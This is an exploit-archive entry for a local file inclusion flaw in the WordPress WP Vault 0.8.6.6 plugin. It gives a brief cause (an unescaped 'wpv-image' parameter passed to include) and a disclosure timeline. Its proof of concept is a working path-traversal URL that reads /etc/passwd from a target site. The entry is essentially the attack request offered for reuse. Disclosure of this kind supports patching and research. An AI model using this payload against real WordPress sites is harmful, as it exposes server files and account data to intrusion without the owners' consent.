Wordpress WP Vault 0.8.6.6 Plugin - Local File Inclusion Vulnerability

2016-12-01T00:00:00
ID 1337DAY-ID-26449
Type zdt
Reporter Lenon Leite
Modified 2016-12-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title:  WP Vault 0.8.6.6 – Plugin WordPress – Local File Inclusion
# Date: 28/11/2016
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/wp-vault/
# Software Link: https://wordpress.org/plugins/wp-vault/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 0.8.6.6
# Tested on: Ubuntu 14.04
 
1 - Description:
 
$_GET[“wpv-image”] is not escaped in include file.
 
http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/
 
 
2 - Proof of Concept:
 
http://Target/?wpv-image=[LFI]
 
http://Target/?wpv-image=../../../../../../../../../../etc/passwd
 
3 - Timeline:
 
12/11/2016 - Discovered
12/11/2016 - vendor not found

#  0day.today [2018-03-13]  #